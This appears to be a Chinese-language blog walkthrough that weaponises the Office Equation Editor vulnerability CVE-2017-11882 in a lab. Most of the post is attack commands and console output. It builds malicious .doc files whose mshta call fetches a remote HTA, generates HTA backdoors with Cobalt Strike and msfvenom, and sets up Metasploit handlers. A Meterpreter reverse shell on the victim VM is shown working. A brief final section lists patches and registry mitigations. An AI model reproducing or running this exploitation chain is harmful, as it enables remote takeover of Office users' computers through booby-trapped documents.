最近这段时间CVE-2017-11882挺火的。关于这个漏洞详情分析可以查看:隐藏17年的Office远程代码执行漏洞POC样本分析(CVE-2017-11882)

20号有人在twitter上共享了一个POC,Twitter地址POC地址,后来又有人共享了一个项目CVE-2017-11882,是通过对rtf文件的修改来实现命令执行的目的,但是有个缺陷,这个项目使用的是使用webdav的方式来执行远程文件的,执行命令被限制在43字节内;

后来Evi1cg师傅对POC进行了修改,使用很方便,利用也很简单,而且添加了109字节的脚本,Github地址:https://github.com/Ridter/CVE-2017-11882

环境

本机:192.168.43.100 虚拟机:Microsoft Windows 7 旗舰版 Service Pack 1:192.168.43.103 Office:2016版

Usage?

python Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

use mshta

python Command43b_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc

Demo

CVE-2017-11881-1.png

CVE-2017-11881-2.png

利用 cobaltstrike

添加一个 windows/beacon_http/reverse_http 的listeners;

CVE-2017-11883-3.png

Attacks-Packages-HTTP Application 选择VBS文件,Generate来生成hta后门文件;

使用php -S 192.168.43.100:8000临时开启一个web服务;

也可以使用python -m SimpleHTTPServer 8000

然后使用师傅的脚本来生成doc文件;

CVE-2017-11882-6.png

HTA依赖于mshta解析,而mshta.exe又是系统下自带的,所以并不用免杀就能直接调用执行;

在虚拟机使用office打开这个doc,可看到主机上线;

CVE-2017-11883-5.png

利用 Metasploit

利用msfvenom生成hta木马文件;

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.100 lport=4444 -f hta-psh > abc.hta  

CVE-2017-11882-7.png

监听即可;

msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.43.100
LHOST => 192.168.43.100
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.43.100:4444 

可以拿到反弹回来的shell,进入到meterpreter;

CVE-2017-11882-8.png

PS_shell

Chamd5的msf模块,可直接在本地开启http服务,很方便;

msf > search PS_shell

Matching Modules
================

   Name                      Disclosure Date  Rank    Description
   ----                      ---------------  ----    -----------
   exploit/windows/PS_shell                   normal  Microsoft Office Payload Delivery


msf > use exploit/windows/PS_shell
msf exploit(PS_shell) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf exploit(PS_shell) > back
msf > use exploit/windows/PS_shell
msf exploit(PS_shell) > show options 

Module options (exploit/windows/PS_shell):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(PS_shell) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(PS_shell) > set lhost 192.168.43.100
lhost => 192.168.43.100
msf exploit(PS_shell) > set uri
set urihost  set uripath  set uriport  
msf exploit(PS_shell) > set uripath abc
uripath => abc
msf exploit(PS_shell) > exploit 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.43.100:4444 
msf exploit(PS_shell) > [*] Using URL: http://0.0.0.0:8080/abc
[*] Local IP: http://192.168.43.100:8080/abc
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.43.100:8080/abc"

利用Command43b_CVE-2017-11882.py生成EXP;

➜  CVE-2017-11882 git:(master) ✗ python Command43b_CVE-2017-11882.py -c "mshta.exe http://192.168.43.100:8080/abc" -o test.doc
[*] Done ! output file --> test.doc

执行,即可上线;

msf exploit(PS_shell) > 
[*] Sending stage (179267 bytes) to 192.168.43.103
[*] Meterpreter session 1 opened (192.168.43.100:4444 -> 192.168.43.103:50160) at 2017-11-30 09:13:13 +0800

msf exploit(PS_shell) > sessions 

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  1         meterpreter x86/windows  Go0s-PC\Go0s @ GO0S-PC  192.168.43.100:4444 -> 192.168.43.103:50160 (192.168.43.103)

msf exploit(PS_shell) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 1304 created.
Channel 1 created.
Microsoft Windows [?汾 6.1.7601]
??Ȩ???? (c) 2009 Microsoft Corporation??????????Ȩ????

C:\Windows\system32>whoami
whoami
go0s-pc\go0s

漏洞影响

可以说影响覆盖全版本了;

Office 365 Microsoft Office 2000 Microsoft Office 2003 Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 Microsoft Office 2013 Service Pack 1 Microsoft Office 2016

修复方案

1、微软已经对此漏洞做出了修复。

(1)下载 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882,更新补丁进行修补;

(2)开启Windows Update功能,定期对系统进行自动更新;

2、由于该公式编辑器已经17年未做更新,可能存在大量安全漏洞,建议在注册表中取消该模块的注册。

按下Win+R组合键,打开cmd.exe;

对应office版本修改以下注册表路径以后,输入:

reg add "HKLM\SOFTWARE\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000- 0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
 
reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

3、火绒对其并没有报警…但传360好像禁止 mshta 执行,直接提示;